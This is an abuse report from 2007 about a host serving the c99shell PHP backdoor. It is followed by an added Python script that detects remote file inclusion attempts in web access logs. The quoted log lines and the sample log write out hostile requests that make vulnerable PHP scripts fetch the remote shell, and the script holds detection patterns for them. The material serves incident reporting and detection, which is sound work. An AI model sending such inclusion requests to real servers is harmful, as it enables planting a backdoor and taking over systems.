-----Original Message-----
From: Piney@essexhosting.com [mailto:Piney@essexhosting.com]
Sent: Sunday, June 24, 2007 10:14 AM
To: jo@tradenet.ee
Subject: Malicious Program hosted by [195.222.18.109]

jo@tradenet.ee

Resolving: no.spam.ee... 195.222.18.109

====================

The enclosed log shows evidence that the machine having IP address 195.222.18.109 is being used as a source of software to launch attacks against other systems. Please note the entries in the log where the web address, "no.spam.ee", is being used as the target for downloads of the file, [c99shell.txt].

=========================

The file, 'c99shell.txt', is available for download from "no.spam.ee". PHP/C99Shell is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell listens for commands from a remote user. The destructive tools available to the remote user once 'c99shell' is installed on a compromised computer are many and varied.

=========================

The IP address of the system reporting this attack is 72.232.215.26. The destination port was TCP/80. Times listed are UTC and are accurate.

We understand that this IP address was not involved as the address launching the attack. It is being used by the attack script as its store of attack weapons. The organizations responsible for the source of the attacks have also been notified of this incident.

This use of the system having IP address 195.222.18.109 is a probable violation of your Acceptable Use Policy. Please deal with this incident in accord with that policy.

Thank you

Piney@essexhosting.com
72.232.215.26 (essexhosting.net)

Server Log: IP addresses obfuscated for privacy.

[Sat Jun 23 06:33:33 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security: Access allowed. Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.malwarebytes.org"] [uri "/rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]
[xxx.xxx.xxx.xxx] - - [23/Jun/2007:06:05:42 +0000] "GET /rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1" 404 525 ";)" "Firefox/2.0.0.3" (malwarebytes.org) "-"
[xxx.xxx.xxx.xxx] - - [23/Jun/2007:06:33:33 +0000] "GET /rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1" 404 525 ";)" "Firefox/2.0.0.3" (malwarebytes.org) "-"
[Sat Jun 23 22:59:49 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security: Access allowed. Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.malwarebytes.org"] [uri "/aboutbuster.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]
[Sat Jun 23 23:01:01 2007] [error] [client [xxx.xxx.xxx.xxx]] mod_security: Access allowed. Pattern match "/c99shell\\\\.txt" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.malwarebytes.org"] [uri "/qoofix.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt?"]
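The requests in the log above are remote file inclusion (RFI) probes: the attacker appends the URL of a remotely hosted PHP shell to a local PHP script, hoping a vulnerable include() will fetch and execute it, and the trailing "?" turns anything the script appends to the included path into a harmless query string. In the report's lines the URL is fused straight onto the path (hence the 404s); the more common form passes it in a query parameter. The following Python script is an added example, not part of the original report or its log: it parses combined-format access log lines, flags requests carrying a second absolute URL that looks like a payload, and groups the hits by the host serving the payload, which is the party an abuse report like the one above is addressed to. The sample log is constructed after the report's entries with RFC 5737 documentation addresses in place of the obfuscated client IPs, and it adds the query-parameter form and two benign requests that the report's lines do not show.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample log, modelled on the report's combined-format access log
# entries. Client addresses are RFC 5737 documentation addresses standing in
# for the obfuscated ones; the last three lines are added to show the
# query-parameter form of the probe and two benign requests.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jun/2007:06:05:42 +0000] "GET /rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1" 404 525 ";)" "Firefox/2.0.0.3"
192.0.2.10 - - [23/Jun/2007:06:33:33 +0000] "GET /rogueremover.phphttp://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1" 404 525 ";)" "Firefox/2.0.0.3"
198.51.100.7 - - [23/Jun/2007:22:59:49 +0000] "GET /aboutbuster.php?page=http://no.spam.ee/~tonu/phpshell/c99shell.txt? HTTP/1.1" 200 1100 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2007:23:10:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2007:23:11:00 +0000] "GET /redirect.php?url=https://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Common/combined log format up to the response size; the referer and
# user-agent fields are not needed for this check.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A second absolute URL anywhere in the request target, either fused onto the
# path (as in the report) or passed as a parameter value.
EMBEDDED_URL_RE = re.compile(r'(?:https?|ftp)://[^\s"\'&]+', re.I)

# Extensions under which remotely hosted PHP shells are typically served.
PAYLOAD_EXTS = {'.php', '.txt', '.inc', '.dat', '.gif', '.jpg'}


def parse_line(line):
    """Split one access log line into its fields, or return None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi(entry):
    """Return details of a remote file inclusion attempt in the entry, or None."""
    target = entry['target']
    if target.startswith(('http://', 'https://')):
        return None  # absolute-form request line (proxy style), not an embedded URL
    m = EMBEDDED_URL_RE.search(target)
    if not m:
        return None
    remote = m.group(0)
    parts = urlsplit(remote)
    last = parts.path.rsplit('/', 1)[-1].lower()
    ext = '.' + last.rsplit('.', 1)[-1] if '.' in last else ''
    # The trailing '?' is the classic RFI trick: whatever the vulnerable script
    # appends to the included path (e.g. ".php") becomes part of a query string.
    if not (remote.endswith('?') or ext in PAYLOAD_EXTS):
        return None
    return {
        'client': entry['client'],
        'time': entry['time'],
        'local_script': target[:m.start()].split('?', 1)[0],
        'host': parts.hostname,
        'remote': remote,
        'status': int(entry['status']),
    }


def scan(log_text):
    """Run the RFI check over every parseable line and collect the hits."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hit = find_rfi(entry)
        if hit:
            findings.append(hit)
    return findings


def by_hosting_host(findings):
    """Group hits by the host serving the payload: the recipient of the abuse report."""
    groups = defaultdict(list)
    for f in findings:
        groups[f['host']].append(f)
    return dict(groups)


if __name__ == '__main__':
    for host, items in by_hosting_host(scan(SAMPLE_LOG)).items():
        clients = {f['client'] for f in items}
        print(f"{host}: {len(items)} inclusion attempt(s) from {len(clients)} client(s)")
        for f in items:
            print(f"  {f['time']} client={f['client']} script={f['local_script']} "
                  f"-> {f['remote']} ({f['status']})")
```

The check deliberately ignores a bare URL in a parameter (the redirect.php line) unless it ends in "?" or points at a file type shells are served as, which keeps ordinary redirect and link parameters out of the report; the mod_security entries above, by contrast, matched on the file name alone, and "Access allowed" shows the rule was logging rather than blocking.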